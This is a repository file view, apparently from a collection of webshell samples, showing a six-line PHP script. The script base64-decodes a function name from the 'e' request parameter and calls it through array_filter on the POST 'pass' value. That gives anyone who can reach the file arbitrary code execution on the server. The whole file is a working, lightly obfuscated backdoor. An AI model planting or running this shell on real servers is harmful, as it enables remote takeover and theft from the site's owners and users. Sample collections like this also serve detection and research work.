webshell/php/2020.08.20.10.php

6 lines
112 B
PHP
Raw Normal View History

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>